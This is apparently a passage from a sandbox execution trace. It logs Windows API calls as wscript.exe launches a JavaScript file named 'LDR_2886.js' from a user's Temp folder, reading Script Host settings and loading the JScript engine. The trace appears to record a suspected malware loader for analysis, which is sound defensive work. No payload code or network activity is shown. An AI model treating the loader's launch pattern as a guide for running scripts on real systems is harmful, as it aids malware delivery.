	[0265.325] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x154
	[0265.325] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x158
	[0265.325] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x344
	[0265.326] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x308
	[0265.326] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x30c
	[0265.329] CoTaskMemAlloc (cb=0x104) returned 0x46edf0
	[0265.329] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46edf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.329] CoTaskMemFree (pv=0x46edf0) 
	[0265.331] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0265.332] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x29de50 | out: lpMode=0x29de50) returned 1
	[0265.334] CoTaskMemAlloc (cb=0x104) returned 0x46edf0
	[0265.334] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46edf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.334] CoTaskMemFree (pv=0x46edf0) 
	[0265.337] SetEvent (hEvent=0x36c) returned 1
	[0265.338] SetEvent (hEvent=0x32c) returned 1
	[0265.338] SetEvent (hEvent=0x364) returned 1
	[0265.338] SetEvent (hEvent=0x368) returned 1
	[0265.338] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
	[0265.341] CoTaskMemAlloc (cb=0x104) returned 0x46edf0
	[0265.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46edf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.341] CoTaskMemFree (pv=0x46edf0) 
	[0265.342] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x29dba8 | out: phkResult=0x29dba8*=0x334) returned 0x0
	[0265.342] RegQueryValueExW (in: hKey=0x334, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x29db2c, lpData=0x0, lpcbData=0x29db28*=0x0 | out: lpType=0x29db2c*=0x0, lpData=0x0, lpcbData=0x29db28*=0x0) returned 0x2

Thread:
	id = 235
	os_tid = 0x908


Thread:
	id = 236
	os_tid = 0x5c8


Thread:
	id = 242
	os_tid = 0xb98


Thread:
	id = 246
	os_tid = 0x820


Thread:
	id = 247
	os_tid = 0x40c

	[0097.809] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0149.268] LocalFree (hMem=0x3c38f0) returned 0x0
	[0149.268] CloseHandle (hObject=0x320) returned 1
	[0149.268] CloseHandle (hObject=0x13) returned 1
	[0149.279] CloseHandle (hObject=0xf) returned 1
	[0149.279] RegCloseKey (hKey=0x30c) returned 0x0
	[0149.279] RegCloseKey (hKey=0x308) returned 0x0
	[0149.280] RegCloseKey (hKey=0x304) returned 0x0
	[0149.280] LocalFree (hMem=0x3c38c0) returned 0x0
	[0149.280] RegCloseKey (hKey=0x32c) returned 0x0
	[0174.212] RegCloseKey (hKey=0x2e4) returned 0x0
	[0212.586] RegCloseKey (hKey=0x360) returned 0x0
	[0212.586] RegCloseKey (hKey=0x35c) returned 0x0
	[0212.586] RegCloseKey (hKey=0x358) returned 0x0
	[0212.586] RegCloseKey (hKey=0x354) returned 0x0
	[0212.586] RegCloseKey (hKey=0x350) returned 0x0
	[0212.587] RegCloseKey (hKey=0x34c) returned 0x0
	[0212.587] RegCloseKey (hKey=0x348) returned 0x0
	[0212.587] RegCloseKey (hKey=0x378) returned 0x0
	[0212.587] RegCloseKey (hKey=0x374) returned 0x0
	[0212.587] RegCloseKey (hKey=0x338) returned 0x0
	[0212.588] RegCloseKey (hKey=0x334) returned 0x0
	[0212.588] RegCloseKey (hKey=0x320) returned 0x0
	[0212.588] RegCloseKey (hKey=0x30c) returned 0x0
	[0212.588] RegCloseKey (hKey=0x308) returned 0x0
	[0212.589] RegCloseKey (hKey=0x304) returned 0x0
	[0212.589] RegCloseKey (hKey=0x32c) returned 0x0
	[0212.589] RegCloseKey (hKey=0x324) returned 0x0
	[0212.589] RegCloseKey (hKey=0x31c) returned 0x0
	[0212.589] RegCloseKey (hKey=0x370) returned 0x0
	[0212.589] RegCloseKey (hKey=0x36c) returned 0x0
	[0212.590] RegCloseKey (hKey=0x368) returned 0x0
	[0212.590] RegCloseKey (hKey=0x344) returned 0x0
	[0252.836] RegCloseKey (hKey=0x324) returned 0x0
	[0252.836] RegCloseKey (hKey=0x31c) returned 0x0
	[0252.836] RegCloseKey (hKey=0x370) returned 0x0
	[0252.836] RegCloseKey (hKey=0x36c) returned 0x0
	[0252.837] RegCloseKey (hKey=0x368) returned 0x0
	[0252.837] RegCloseKey (hKey=0x364) returned 0x0
	[0252.837] RegCloseKey (hKey=0x32c) returned 0x0

Thread:
	id = 349
	os_tid = 0xd08


Process:
	id = "28"
	image_name = "wscript.exe"
	filename = "c:\\windows\\system32\\wscript.exe"
	page_root = "0x50562000"
	os_pid = "0xa34"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x910"
	cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 229
	os_tid = 0x358

	[0093.845] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19fb00 | out: lpSystemTimeAsFileTime=0x19fb00*(dwLowDateTime=0xb04816f0, dwHighDateTime=0x1d543d1)) 
	[0093.845] GetCurrentProcessId () returned 0xa34
	[0093.845] GetCurrentThreadId () returned 0x358
	[0093.845] GetTickCount () returned 0x28075
	[0093.845] QueryPerformanceCounter (in: lpPerformanceCount=0x19fb08 | out: lpPerformanceCount=0x19fb08*=21827101820) returned 1
	[0093.845] GetStartupInfoA (in: lpStartupInfo=0x19fb20 | out: lpStartupInfo=0x19fb20*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffffffffffff, hStdOutput=0xffffffffffffffff, hStdError=0xffffffffffffffff)) 
	[0093.845] GetModuleHandleA (lpModuleName=0x0) returned 0xff6b0000
	[0093.845] GetModuleHandleA (lpModuleName=0x0) returned 0xff6b0000
	[0093.845] GetVersionExA (in: lpVersionInformation=0x19fa40*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x1f1eb0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19fa40*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0093.845] GetUserDefaultLCID () returned 0x409
	[0093.846] CoInitialize (pvReserved=0x0) returned 0x0
	[0094.479] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	[0094.480] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" ") returned 85
	[0094.480] ??2@YAPEAX_K@Z () returned 0x4257b0
	[0094.480] ??2@YAPEAX_K@Z () returned 0x425f60
	[0094.480] GetCurrentThreadId () returned 0x358
	[0094.480] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f788 | out: phkResult=0x19f788*=0x7c) returned 0x0
	[0094.480] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f780 | out: phkResult=0x19f780*=0x80) returned 0x0
	[0094.480] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x19ea88, lpData=0x19ee90, lpcbData=0x19ea80*=0x400 | out: lpType=0x19ea88*=0x0, lpData=0x19ee90*=0x67, lpcbData=0x19ea80*=0x400) returned 0x2
	[0094.480] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x19ea88, lpData=0x19ee90, lpcbData=0x19ea80*=0x400 | out: lpType=0x19ea88*=0x0, lpData=0x19ee90*=0x67, lpcbData=0x19ea80*=0x400) returned 0x2
	[0094.480] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x19ea88, lpData=0x19ee90, lpcbData=0x19ea80*=0x400 | out: lpType=0x19ea88*=0x0, lpData=0x19ee90*=0x67, lpcbData=0x19ea80*=0x400) returned 0x2
	[0094.481] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0095.068] RegCloseKey (hKey=0x80) returned 0x0
	[0095.068] RegCloseKey (hKey=0x7c) returned 0x0
	[0095.069] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f4a0 | out: phkResult=0x19f4a0*=0x7c) returned 0x0
	[0095.069] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f498 | out: phkResult=0x19f498*=0x80) returned 0x0
	[0095.069] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x19e7a8, lpData=0x19ebb0, lpcbData=0x19e7a0*=0x400 | out: lpType=0x19e7a8*=0x0, lpData=0x19ebb0*=0x0, lpcbData=0x19e7a0*=0x400) returned 0x2
	[0095.069] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x19e7a8, lpData=0x19ebb0, lpcbData=0x19e7a0*=0x400 | out: lpType=0x19e7a8*=0x0, lpData=0x19ebb0*=0x0, lpcbData=0x19e7a0*=0x400) returned 0x2
	[0095.069] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x19e7a8, lpData=0x19ebb0, lpcbData=0x19e7a0*=0x400 | out: lpType=0x19e7a8*=0x0, lpData=0x19ebb0*=0x0, lpcbData=0x19e7a0*=0x400) returned 0x2
	[0095.069] RegCloseKey (hKey=0x80) returned 0x0
	[0095.069] RegCloseKey (hKey=0x7c) returned 0x0
	[0095.069] GetACP () returned 0x4e4
	[0095.069] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77040000
	[0095.069] GetProcAddress (hModule=0x77040000, lpProcName="HeapSetInformation") returned 0x7705c4a0
	[0095.069] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0095.069] FreeLibrary (hLibModule=0x77040000) returned 1
	[0095.069] ??2@YAPEAX_K@Z () returned 0x425f80
	[0095.070] CoRegisterMessageFilter (in: lpMessageFilter=0x425f80, lplpMessageFilter=0x425f90 | out: lplpMessageFilter=0x425f90*=0x0) returned 0x0
	[0095.070] GetModuleFileNameW (in: hModule=0xff6b0000, lpFilename=0x19f7e0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0095.070] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", lpdwHandle=0x19f130 | out: lpdwHandle=0x19f130) returned 0x704
	[0095.071] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x19ea20 | out: lpData=0x19ea20) returned 1
	[0095.071] VerQueryValueW (in: pBlock=0x19ea20, lpSubBlock="\\", lplpBuffer=0x19f138, puLen=0x19f134 | out: lplpBuffer=0x19f138*=0x19ea48, puLen=0x19f134) returned 1
	[0095.071] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f188 | out: phkResult=0x19f188*=0x7c) returned 0x0
	[0095.071] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x19e4d8, lpData=0x19e8e0, lpcbData=0x19e4d0*=0x400 | out: lpType=0x19e4d8*=0x0, lpData=0x19e8e0*=0x0, lpcbData=0x19e4d0*=0x400) returned 0x2
	[0095.071] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f140 | out: phkResult=0x19f140*=0x80) returned 0x0
	[0095.071] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x19f104, lpData=0x19f180, lpcbData=0x19f100*=0x4 | out: lpType=0x19f104*=0x0, lpData=0x19f180*=0xb0, lpcbData=0x19f100*=0x4) returned 0x2
	[0095.071] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x19e4d8, lpData=0x19e8e0, lpcbData=0x19e4d0*=0x400 | out: lpType=0x19e4d8*=0x0, lpData=0x19e8e0*=0x0, lpcbData=0x19e4d0*=0x400) returned 0x2
	[0095.071] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x19f104, lpData=0x19f180, lpcbData=0x19f100*=0x4 | out: lpType=0x19f104*=0x0, lpData=0x19f180*=0xb0, lpcbData=0x19f100*=0x4) returned 0x2
	[0095.071] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x19e4d8, lpData=0x19e8e0, lpcbData=0x19e4d0*=0x400 | out: lpType=0x19e4d8*=0x1, lpData="1", lpcbData=0x19e4d0*=0x4) returned 0x0
	[0095.071] lstrlenW (lpString="1") returned 1
	[0095.071] lstrlenW (lpString="0") returned 1
	[0095.071] lstrlenW (lpString="1") returned 1
	[0095.071] lstrlenW (lpString="no") returned 2
	[0095.071] lstrlenW (lpString="1") returned 1
	[0095.071] lstrlenW (lpString="false") returned 5
	[0095.072] RegCloseKey (hKey=0x80) returned 0x0
	[0095.072] RegCloseKey (hKey=0x7c) returned 0x0
	[0095.072] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x19f188, lpdwDisposition=0x0 | out: phkResult=0x19f188*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0095.072] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x19f124, lpData=0x19f180, lpcbData=0x19f120*=0x4 | out: lpType=0x19f124*=0x0, lpData=0x19f180*=0xb0, lpcbData=0x19f120*=0x4) returned 0x2
	[0095.072] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x19e4f8, lpData=0x19e900, lpcbData=0x19e4f0*=0x400 | out: lpType=0x19e4f8*=0x1, lpData="1", lpcbData=0x19e4f0*=0x4) returned 0x0
	[0095.072] lstrlenW (lpString="1") returned 1
	[0095.072] lstrlenW (lpString="0") returned 1
	[0095.072] lstrlenW (lpString="1") returned 1
	[0095.072] lstrlenW (lpString="no") returned 2
	[0095.072] lstrlenW (lpString="1") returned 1
	[0095.072] lstrlenW (lpString="false") returned 5
	[0095.072] RegCloseKey (hKey=0x7c) returned 0x0
	[0095.072] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x19f188, lpdwDisposition=0x0 | out: phkResult=0x19f188*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0095.072] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x19f124, lpData=0x19f180, lpcbData=0x19f120*=0x4 | out: lpType=0x19f124*=0x0, lpData=0x19f180*=0xb0, lpcbData=0x19f120*=0x4) returned 0x2
	[0095.072] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x19e4f8, lpData=0x19e900, lpcbData=0x19e4f0*=0x400 | out: lpType=0x19e4f8*=0x0, lpData=0x19e900*=0x31, lpcbData=0x19e4f0*=0x400) returned 0x2
	[0095.072] RegCloseKey (hKey=0x7c) returned 0x0
	[0095.072] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js") returned 48
	[0095.072] lstrlenW (lpString="js") returned 2
	[0095.072] lstrlenW (lpString="WSH") returned 3
	[0095.072] ??2@YAPEAX_K@Z () returned 0x425870
	[0095.073] LoadStringW (in: hInstance=0xff6b0000, uID=0x9c5, lpBuffer=0x19dbf0, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
	[0095.073] LoadTypeLib (in: szFile="C:\\Windows\\System32\\WScript.exe", pptlib=0x19ec30*=0x0 | out: pptlib=0x19ec30*=0x21d100) returned 0x0
	[0095.078] ITypeLib:GetTypeInfoOfGuid (in: This=0x21d100, GUID=0xff6b58f0, ppTInfo=0x19ec18 | out: ppTInfo=0x19ec18*=0x21e4e8) returned 0x0
	[0095.080] ITypeInfo:GetRefTypeOfImplType (in: This=0x21e4e8, index=0xffffffff, pRefType=0x19ec10 | out: pRefType=0x19ec10*=0xfffffffe) returned 0x0
	[0095.080] ITypeInfo:GetRefTypeInfo (in: This=0x21e4e8, hreftype=0xfffffffe, ppTInfo=0xff6cf458 | out: ppTInfo=0xff6cf458*=0x21e540) returned 0x0
	[0095.080] IUnknown:Release (This=0x21e4e8) returned 0x1
	[0095.080] ??2@YAPEAX_K@Z () returned 0x425900
	[0095.080] ??2@YAPEAX_K@Z () returned 0x4259a0
	[0095.080] ??2@YAPEAX_K@Z () returned 0x425a00
	[0095.080] ITypeLib:GetTypeInfoOfGuid (in: This=0x21d100, GUID=0xff6b5950, ppTInfo=0x19ec18 | out: ppTInfo=0x19ec18*=0x21e598) returned 0x0
	[0095.081] ITypeInfo:GetRefTypeOfImplType (in: This=0x21e598, index=0xffffffff, pRefType=0x19ec10 | out: pRefType=0x19ec10*=0xfffffffe) returned 0x0
	[0095.081] ITypeInfo:GetRefTypeInfo (in: This=0x21e598, hreftype=0xfffffffe, ppTInfo=0xff6cf4d8 | out: ppTInfo=0xff6cf4d8*=0x21e5f0) returned 0x0
	[0095.081] IUnknown:Release (This=0x21e598) returned 0x1
	[0095.081] ITypeLib:GetTypeInfoOfGuid (in: This=0x21d100, GUID=0xff6b5960, ppTInfo=0x19ec18 | out: ppTInfo=0x19ec18*=0x21e648) returned 0x0
	[0095.081] ITypeInfo:GetRefTypeOfImplType (in: This=0x21e648, index=0xffffffff, pRefType=0x19ec10 | out: pRefType=0x19ec10*=0xfffffffe) returned 0x0
	[0095.081] ITypeInfo:GetRefTypeInfo (in: This=0x21e648, hreftype=0xfffffffe, ppTInfo=0xff6cf518 | out: ppTInfo=0xff6cf518*=0x21e6a0) returned 0x0
	[0095.081] IUnknown:Release (This=0x21e648) returned 0x1
	[0095.081] ITypeLib:GetTypeInfoOfGuid (in: This=0x21d100, GUID=0xff6b5910, ppTInfo=0x19ec18 | out: ppTInfo=0x19ec18*=0x21e6f8) returned 0x0
	[0095.081] ITypeInfo:GetRefTypeOfImplType (in: This=0x21e6f8, index=0xffffffff, pRefType=0x19ec10 | out: pRefType=0x19ec10*=0xfffffffe) returned 0x0
	[0095.081] ITypeInfo:GetRefTypeInfo (in: This=0x21e6f8, hreftype=0xfffffffe, ppTInfo=0xff6cf498 | out: ppTInfo=0xff6cf498*=0x21e750) returned 0x0
	[0095.081] IUnknown:Release (This=0x21e6f8) returned 0x1
	[0095.081] IUnknown:Release (This=0x21d100) returned 0x4
	[0095.081] ??2@YAPEAX_K@Z () returned 0x425a60
	[0095.081] GetCurrentThreadId () returned 0x358
	[0095.081] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc
	[0095.081] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xff6c1cf8, lpParameter=0x425a60, dwCreationFlags=0x0, lpThreadId=0x425a88 | out: lpThreadId=0x425a88*=0x110) returned 0xd4
	[0095.082] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x19ee70*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0095.789] CloseHandle (hObject=0xcc) returned 1
	[0095.789] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", nBufferLength=0x104, lpBuffer=0x19ef00, lpFilePart=0x19eef0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", lpFilePart=0x19eef0*="LDR_2886.js") returned 0x30
	[0095.789] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".js", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e410 | out: phkResult=0x19e410*=0xe6) returned 0x0
	[0095.790] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x19e3c0, lpData=0x19e420, lpcbData=0x19e3c4*=0x800 | out: lpType=0x19e3c0*=0x1, lpData="JSFile", lpcbData=0x19e3c4*=0xe) returned 0x0
	[0095.790] RegCloseKey (hKey=0xe6) returned 0x0
	[0095.790] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="JSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e410 | out: phkResult=0x19e410*=0xe6) returned 0x0
	[0095.790] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x19e3c0, lpData=0x19ec90, lpcbData=0x19e3c4*=0x200 | out: lpType=0x19e3c0*=0x1, lpData="JScript", lpcbData=0x19e3c4*=0x10) returned 0x0
	[0095.790] RegCloseKey (hKey=0xe6) returned 0x0
	[0095.790] ??2@YAPEAX_K@Z () returned 0x4263a0
	[0095.790] GetProcessHeap () returned 0x1f0000
	[0095.790] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x0, Size=0x2000) returned 0x228430
	[0095.791] CLSIDFromString (in: lpsz="JScript", pclsid=0x19ec08 | out: pclsid=0x19ec08*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58))) returned 0x0
	[0095.791] CoCreateInstance (rclsid=0x19ec08*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xff6b1800*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ec00) 
	[0095.801] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ce00 | out: lpSystemTimeAsFileTime=0x19ce00*(dwLowDateTime=0xb170a100, dwHighDateTime=0x1d543d1)) 
	[0095.801] GetCurrentProcessId () returned 0xa34
	[0095.801] GetCurrentThreadId () returned 0x358
	[0095.801] GetTickCount () returned 0x28813
	[0095.801] QueryPerformanceCounter (in: lpPerformanceCount=0x19ce08 | out: lpPerformanceCount=0x19ce08*=22022684921) returned 1
	[0095.801] malloc (_Size=0x100) returned 0x426670
	[0095.801] __dllonexit () returned 0x7fedf500728
	[0095.801] __dllonexit () returned 0x7fedf500780
	[0095.801] __dllonexit () returned 0x7fedf500750
	[0095.802] __dllonexit () returned 0x7fedf5007b0
	[0095.802] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefd710000
	[0095.802] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegisterTraceGuidsA") returned 0x7717f570
	[0095.802] EtwRegisterTraceGuidsA () returned 0x0
	[0095.802] EtwRegisterTraceGuidsA () returned 0x0
	[0095.802] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x19c9f0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0095.803] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegOpenKeyExA") returned 0x7fefd72b5f0
	[0095.803] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x19cb58 | out: phkResult=0x19cb58*=0x0) returned 0x2
	[0095.819] IdentifyCodeAuthzLevelW () returned 0x1
	[0096.418] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19df00 | out: lpSystemTimeAsFileTime=0x19df00*(dwLowDateTime=0xb1cb6b30, dwHighDateTime=0x1d543d1)) 
	[0096.418] GetCurrentProcessId () returned 0xa34
	[0096.418] GetCurrentThreadId () returned 0x358
	[0096.418] GetTickCount () returned 0x28a63
	[0096.418] QueryPerformanceCounter (in: lpPerformanceCount=0x19df08 | out: lpPerformanceCount=0x19df08*=22084418337) returned 1
	[0096.418] malloc (_Size=0x100) returned 0x427b60
	[0096.419] GetVersionExA (in: lpVersionInformation=0x19dce0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe33af810, dwBuildNumber=0x7fe, dwPlatformId=0xe33a0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x19dce0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0096.419] GetUserDefaultLCID () returned 0x409
	[0096.420] IsFileSupportedName () returned 0x1
	[0096.420] _wcsicmp (_String1=".vbs", _String2=".js") returned 12
	[0096.420] _wcsicmp (_String1=".vbe", _String2=".js") returned 12
	[0096.420] _wcsicmp (_String1=".js", _String2=".js") returned 0
	[0096.424] GetSignedDataMsg () returned 0x0
	[0096.424] GetCurrentProcess () returned 0xffffffffffffffff
	[0096.424] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x114, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x19e540, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19e540*=0x140) returned 1
	[0096.424] GetFileSize (in: hFile=0x140, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0096.424] ??2@YAPEAX_K@Z () returned 0x42a4f0
	[0096.424] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0096.424] ReadFile (in: hFile=0x140, lpBuffer=0x42a4f0, nNumberOfBytesToRead=0x4b68, lpNumberOfBytesRead=0x19e520, lpOverlapped=0x0 | out: lpBuffer=0x42a4f0*, lpNumberOfBytesRead=0x19e520*=0x4b68, lpOverlapped=0x0) returned 1
	[0096.424] CoInitialize (pvReserved=0x0) returned 0x1
	[0096.424] CoCreateInstance (in: rclsid=0x7fee33af850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x19e490 | out: ppv=0x19e490*=0x42f4c0) returned 0x0
